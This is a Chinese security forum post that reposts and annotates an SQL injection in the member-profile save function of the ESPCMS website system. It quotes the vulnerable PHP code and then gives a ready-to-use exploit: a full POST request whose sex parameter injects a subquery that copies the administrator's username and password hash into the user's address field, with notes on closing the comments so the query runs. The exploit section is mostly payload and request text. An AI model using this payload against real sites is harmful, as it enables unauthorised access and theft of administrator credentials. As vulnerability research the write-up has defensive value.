Espcms SQL注入漏洞 第二弹
http://team.f4ck.net/thread-10337-1-1.html
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统。
易思ESPCMS企业网站管理系统V5.6.13.04.03的会员中心模块存在SQL注入漏洞,攻击者可利用此漏洞破坏应用,执行未授权操作。
漏洞文件: interface/membermain.php
function in_save() { parent::start_pagetemplate(); parent::member_purview(); $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG; $inputclass = $this->fun->accept('inputclass', 'R'); $upurl = $this->fun->accept('upurl', 'R'); $userid = intval($this->fun->accept('userid', 'P')); $username = $this->fun->accept('username', 'P'); if (empty($userid) || empty($username)) { $linkURL = $this->mlink['center']; $this->callmessage($this->lng['member_edit_ok'], $linkURL, $this->lng['gobackurlbotton']); } $email = trim($this->fun->accept('email', 'P')); $question = trim($this->fun->accept('question', 'P', true, true)); $answer = trim($this->fun->accept('answer', 'P', true, true)); $alias = trim($this->fun->accept('alias', 'P', true, true));//通过一个accept函数,确定为post提交 $sex = $this->fun->accept('sex', 'P');//注得就是你了.$sex可控, $sex = empty($sex) ? 0 : $sex; $tel = trim($this->fun->accept('tel', 'P', true, true)); $mobile = trim($this->fun->accept('mobile', 'P', true, true)); $birthday = $this->fun->accept('birthday', 'P'); $birthday = empty($birthday) ? 0 : $this->fun->formatdate($birthday, 4); $country = intval($this->fun->accept('cityone', 'P')); $country = empty($country) ? 0 : $country; $province = intval($this->fun->accept('citytwo', 'P')); $province = empty($province) ? 0 : $province; $city = intval($this->fun->accept('citythree', 'P')); $city = empty($city) ? 0 : $city; $district = intval($this->fun->accept('district', 'P')); $district = empty($district) ? 0 : $district; $address = trim($this->fun->accept('address', 'P', true, true)); $zipcode = trim($this->fun->accept('zipcode', 'P', true, true)); $zipcode = empty($zipcode) ? 0 : $zipcode; $msn = trim($this->fun->accept('msn', 'P', true, true)); $qq = $this->fun->accept('qq', 'P'); $qq = empty($qq) ? 0 : $qq; $db_table = db_prefix . 'member'; $db_table2 = db_prefix . 'member_value';
下面来看看怎么进行入库处理的吧。
$db_where = 'userid=' . $userid;
$db_set= "sex=$sex,birthday=$birthday,country=$country,province=$province,city=$city,district=$district,alias='$alias',address='$address',zipcode=$zipcode,tel='$tel',mobile='$mobile',qq=$qq,msn='$msn'";
$this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);
Update注入,看了下数据库,address为varchar。
因为这个cms有个防报错的函数,构造遇到了点麻烦,一出错就显示Can not connect to Mysql server,
追踪下此函数:
function halt($message = '', $sql = '') { $db_err = !db_err ? 0 : db_err; $db_sql = !db_sql ? 0 : db_sql; $mysqlinfo = '<font size="2"><b>ESPCMS SQL Error:</b> Can not connect to MySQL server<b>Time:</b>' . date('e Y-m-d H-i-s', time()); $mysqlinfo.= $db_sql ? '<b>SQL:</b>' . $sql : ''; $mysqlinfo.= $db_err ? '<b>Error:</b>' . mysql_error() : ''; $mysqlinfo.= '<a target="_blank" href="http://www.espcms.com">http://www.espcms.com</a> Access Query Errors</font>'; exit($mysqlinfo); }
为了方便构造, 把出错的sql语句和出错的提示都打印出来。
sex=1,birthday=2013-04-02,country=0,province=0,city=0,district=0,alias=1,address=(select concat(username,CHAR(0x7c),password) from espcms_admin_member limit 1),zipcode=0,tel=0,mobile=0,qq=0,msn=0/*&birthday=2013-04-02&cityone=0&citytwo=0&citythree=0&district=0&address=12&zipcode=0&tel=&mobile=&msn=&qq=*/
以上为原文。
以下为漏洞利用备注:
EXP
POST的数据包:
POST /index.php?ac=membermain&at=save
upurl=http%3A%2F%2F192.168.29.173%2Fespcms%2Fespcms_utf8_5.6.13.03.11_b%2Findex.php%3Fac%3Dmembermain%26at%3Deditpassword&inputclass=editinfo&userid=1&username=test1&email=test%4011.com&mvid=&alias=1&sex=1,birthday=2013-04-02,country=0,province=0,city=0,district=0,alias=1,address=(select concat(username,0x7c,password) from espcms_admin_member limit 1),/*&qq=*/&submit=%E7%A1%AE%E8%AE%A4%E4%BF%AE%E6%94%B9%E8%B5%84%E6%96%99
注意:
这里address添加注射语句:(select concat(username,0x7c,password) from espcms_admin_member limit 1),/*
POST的参数zipcode或者qq为*/ ,是和前面的闭合,此处若不提交则程序会给zipcode和qq赋上默认值“0”,且语句的注释符无法闭合会导致报错。
刚开始没搞懂这里,在/interface/membermain.php里250行下添加:
echo $db_set;
发包时回显出数据库中的语句就是
sex=1,birthday=2013-04-02,country=0,province=0,city=0,district=0,alias=1,address=(select concat(username,0x7c,password) from espcms_admin_member limit 1)/*,birthday=0,country=0,province=0,city=0,district=0,alias='1', address='',zipcode=0,tel='',mobile='',qq=*/,msn=''
语句闭合,注入执行。